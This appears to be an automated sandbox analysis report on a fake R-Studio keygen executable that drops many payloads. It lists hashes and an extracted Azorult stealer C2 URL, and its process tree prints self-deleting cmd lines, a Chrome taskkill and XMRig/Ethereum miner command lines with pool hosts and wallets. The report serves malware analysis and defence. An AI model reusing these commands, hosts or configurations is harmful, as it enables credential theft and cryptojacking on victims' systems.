Analysis
-
max time kernel
18s -
max time network
61s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 18:22
Static task
static1
Behavioral task
behavioral1
Sample
R_studio_7_8_serial_number_maker.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
R_studio_7_8_serial_number_maker.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
R_studio_7_8_serial_number_maker.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
R_studio_7_8_serial_number_maker.exe
Resource
win10v20201028
General
-
Target
R_studio_7_8_serial_number_maker.exe
-
Size
5.2MB
-
MD5
c9d0760f5504d9e8ce237543fc4e7562
-
SHA1
12dac9b23d9f95b9647767e15a265a73380ad50b
-
SHA256
2519f6e84956fd35aaf7aa0ac51c2ce4cd8fddc973933936560ddb1efff6a16f
-
SHA512
28e06d8763858601484ec3675b5d0895712b616d69b36d4c584f32dfb56dfe9a7c26ad05dfda27efc2e9512c11d7dedcafd4d69d98baffdda8eb5af9ba99398a
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral1/memory/4992-151-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral1/memory/4992-153-0x00000001402CA898-mapping.dmp xmrig behavioral1/memory/4992-155-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
pid Process 3136 keygen-pr.exe 3088 keygen-step-1.exe 572 keygen-step-3.exe 848 keygen-step-4.exe 3052 key.exe 2836 Setup.exe 2720 key.exe 1864 multitimer.exe 4636 setups.exe 4400 setups.tmp 4572 askinstall20.exe -
Loads dropped DLL 7 IoCs
pid Process 4400 setups.tmp 4400 setups.tmp 4400 setups.tmp 4400 setups.tmp 4400 setups.tmp 4400 setups.tmp 4400 setups.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 106 ipinfo.io 108 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3052 set thread context of 2720 3052 key.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process 3596 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4528 PING.EXE 3460 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 107 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 111 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4400 setups.tmp 4400 setups.tmp -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 2836 Setup.exe Token: SeCreateTokenPrivilege 4572 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4572 askinstall20.exe Token: SeLockMemoryPrivilege 4572 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4572 askinstall20.exe Token: SeMachineAccountPrivilege 4572 askinstall20.exe Token: SeTcbPrivilege 4572 askinstall20.exe Token: SeSecurityPrivilege 4572 askinstall20.exe Token: SeTakeOwnershipPrivilege 4572 askinstall20.exe Token: SeLoadDriverPrivilege 4572 askinstall20.exe Token: SeSystemProfilePrivilege 4572 askinstall20.exe Token: SeSystemtimePrivilege 4572 askinstall20.exe Token: SeProfSingleProcessPrivilege 4572 askinstall20.exe Token: SeIncBasePriorityPrivilege 4572 askinstall20.exe Token: SeCreatePagefilePrivilege 4572 askinstall20.exe Token: SeCreatePermanentPrivilege 4572 askinstall20.exe Token: SeBackupPrivilege 4572 askinstall20.exe Token: SeRestorePrivilege 4572 askinstall20.exe Token: SeShutdownPrivilege 4572 askinstall20.exe Token: SeDebugPrivilege 4572 askinstall20.exe Token: SeAuditPrivilege 4572 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4572 askinstall20.exe Token: SeChangeNotifyPrivilege 4572 askinstall20.exe Token: SeRemoteShutdownPrivilege 4572 askinstall20.exe Token: SeUndockPrivilege 4572 askinstall20.exe Token: SeSyncAgentPrivilege 4572 askinstall20.exe Token: SeEnableDelegationPrivilege 4572 askinstall20.exe Token: SeManageVolumePrivilege 4572 askinstall20.exe Token: SeImpersonatePrivilege 4572 askinstall20.exe Token: SeCreateGlobalPrivilege 4572 askinstall20.exe Token: 31 4572 askinstall20.exe Token: 32 4572 askinstall20.exe Token: 33 4572 askinstall20.exe Token: 34 4572 askinstall20.exe Token: 35 4572 askinstall20.exe Token: SeDebugPrivilege 3596 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4636 setups.exe 4400 setups.tmp -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 4692 wrote to memory of 3232 4692 R_studio_7_8_serial_number_maker.exe 77 PID 4692 wrote to memory of 3232 4692 R_studio_7_8_serial_number_maker.exe 77 PID 4692 wrote to memory of 3232 4692 R_studio_7_8_serial_number_maker.exe 77 PID 3232 wrote to memory of 3136 3232 cmd.exe 80 PID 3232 wrote to memory of 3136 3232 cmd.exe 80 PID 3232 wrote to memory of 3136 3232 cmd.exe 80 PID 3232 wrote to memory of 3088 3232 cmd.exe 81 PID 3232 wrote to memory of 3088 3232 cmd.exe 81 PID 3232 wrote to memory of 3088 3232 cmd.exe 81 PID 3232 wrote to memory of 572 3232 cmd.exe 82 PID 3232 wrote to memory of 572 3232 cmd.exe 82 PID 3232 wrote to memory of 572 3232 cmd.exe 82 PID 3232 wrote to memory of 848 3232 cmd.exe 83 PID 3232 wrote to memory of 848 3232 cmd.exe 83 PID 3232 wrote to memory of 848 3232 cmd.exe 83 PID 3136 wrote to memory of 3052 3136 keygen-pr.exe 85 PID 3136 wrote to memory of 3052 3136 keygen-pr.exe 85 PID 3136 wrote to memory of 3052 3136 keygen-pr.exe 85 PID 848 wrote to memory of 2836 848 keygen-step-4.exe 84 PID 848 wrote to memory of 2836 848 keygen-step-4.exe 84 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 3052 wrote to memory of 2720 3052 key.exe 87 PID 572 wrote to memory of 4464 572 keygen-step-3.exe 89 PID 572 wrote to memory of 4464 572 keygen-step-3.exe 89 PID 572 wrote to memory of 4464 572 keygen-step-3.exe 89 PID 4464 wrote to memory of 4528 4464 cmd.exe 91 PID 4464 wrote to memory of 4528 4464 cmd.exe 91 PID 4464 wrote to memory of 4528 4464 cmd.exe 91 PID 2836 wrote to memory of 1864 2836 Setup.exe 92 PID 2836 wrote to memory of 1864 2836 Setup.exe 92 PID 2836 wrote to memory of 4636 2836 Setup.exe 94 PID 2836 wrote to memory of 4636 2836 Setup.exe 94 PID 2836 wrote to memory of 4636 2836 Setup.exe 94 PID 4636 wrote to memory of 4400 4636 setups.exe 95 PID 4636 wrote to memory of 4400 4636 setups.exe 95 PID 4636 wrote to memory of 4400 4636 setups.exe 95 PID 848 wrote to memory of 4572 848 keygen-step-4.exe 96 PID 848 wrote to memory of 4572 848 keygen-step-4.exe 96 PID 848 wrote to memory of 4572 848 keygen-step-4.exe 96 PID 4572 wrote to memory of 5096 4572 askinstall20.exe 97 PID 4572 wrote to memory of 5096 4572 askinstall20.exe 97 PID 4572 wrote to memory of 5096 4572 askinstall20.exe 97 PID 5096 wrote to memory of 3596 5096 cmd.exe 100 PID 5096 wrote to memory of 3596 5096 cmd.exe 100 PID 5096 wrote to memory of 3596 5096 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\R_studio_7_8_serial_number_maker.exe"C:\Users\Admin\AppData\Local\Temp\R_studio_7_8_serial_number_maker.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:2720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3088
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4528
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Users\Admin\AppData\Local\Temp\16SQ8D90IW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\16SQ8D90IW\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\16SQ8D90IW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\16SQ8D90IW\multitimer.exe" 1 3.1617560584.606a0408ddd4d 1016⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\16SQ8D90IW\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\16SQ8D90IW\multitimer.exe" 2 3.1617560584.606a0408ddd4d7⤵PID:644
-
C:\Users\Admin\AppData\Local\Temp\soz5dlpbupn\wghdrpgkqcv.exe"C:\Users\Admin\AppData\Local\Temp\soz5dlpbupn\wghdrpgkqcv.exe" /VERYSILENT8⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\is-DFC01.tmp\wghdrpgkqcv.tmp"C:\Users\Admin\AppData\Local\Temp\is-DFC01.tmp\wghdrpgkqcv.tmp" /SL5="$10302,2592217,780800,C:\Users\Admin\AppData\Local\Temp\soz5dlpbupn\wghdrpgkqcv.exe" /VERYSILENT9⤵PID:6060
-
-
-
C:\Users\Admin\AppData\Local\Temp\cyiuytcunk3\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cyiuytcunk3\cpyrix.exe" /VERYSILENT8⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\15aq3htaw3z\3exgdwny33y.exe"C:\Users\Admin\AppData\Local\Temp\15aq3htaw3z\3exgdwny33y.exe" /ustwo INSTALL8⤵PID:6104
-
-
C:\Users\Admin\AppData\Local\Temp\t3l4leqjn5s\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\t3l4leqjn5s\Setup3310.exe" /Verysilent /subid=5778⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\is-ES8ES.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-ES8ES.tmp\Setup3310.tmp" /SL5="$2036A,138429,56832,C:\Users\Admin\AppData\Local\Temp\t3l4leqjn5s\Setup3310.exe" /Verysilent /subid=5779⤵PID:4516
-
-
-
C:\Users\Admin\AppData\Local\Temp\ncgyyk5bl5t\vict.exe"C:\Users\Admin\AppData\Local\Temp\ncgyyk5bl5t\vict.exe" /VERYSILENT /id=5358⤵PID:5216
-
C:\Users\Admin\AppData\Local\Temp\is-SV1R7.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-SV1R7.tmp\vict.tmp" /SL5="$203BA,870426,780800,C:\Users\Admin\AppData\Local\Temp\ncgyyk5bl5t\vict.exe" /VERYSILENT /id=5359⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\gm0z4pm2n14\yps1r1twokv.exe"C:\Users\Admin\AppData\Local\Temp\gm0z4pm2n14\yps1r1twokv.exe"8⤵PID:5312
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gm0z4pm2n14\yps1r1twokv.exe"9⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\qhw15vwgy30\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\qhw15vwgy30\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\is-688E2.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-688E2.tmp\IBInstaller_97039.tmp" /SL5="$3024A,14575146,721408,C:\Users\Admin\AppData\Local\Temp\qhw15vwgy30\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5472
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-946HE.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5576
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-946HE.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5904
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p3z3dmne0um\duczco2lsly.exe"C:\Users\Admin\AppData\Local\Temp\p3z3dmne0um\duczco2lsly.exe" /quiet SILENT=1 AF=7568⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\5mms1d1u3ow\app.exe"C:\Users\Admin\AppData\Local\Temp\5mms1d1u3ow\app.exe" /8-238⤵PID:5592
-
-
C:\Users\Admin\AppData\Local\Temp\c312s0pf3ny\vpn.exe"C:\Users\Admin\AppData\Local\Temp\c312s0pf3ny\vpn.exe" /silent /subid=4828⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\is-HPRB9.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-HPRB9.tmp\vpn.tmp" /SL5="$301E2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\c312s0pf3ny\vpn.exe" /silent /subid=4829⤵PID:5920
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0EM7XCDA1Z\setups.exe"C:\Users\Admin\AppData\Local\Temp\0EM7XCDA1Z\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\is-R5TKG.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-R5TKG.tmp\setups.tmp" /SL5="$40134,454998,229376,C:\Users\Admin\AppData\Local\Temp\0EM7XCDA1Z\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"4⤵PID:2516
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:852
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:896
-
C:\Users\Admin\AppData\Roaming\AFBE.tmp.exe"C:\Users\Admin\AppData\Roaming\AFBE.tmp.exe"5⤵PID:2052
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w29352 --cpu-max-threads-hint 50 -r 99996⤵PID:4992
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w29006@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:2064
-
-
-
C:\Users\Admin\AppData\Roaming\B230.tmp.exe"C:\Users\Admin\AppData\Roaming\B230.tmp.exe"5⤵PID:2272
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:2792
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:3460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:844
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:68
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:1240
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4040
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3364
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4460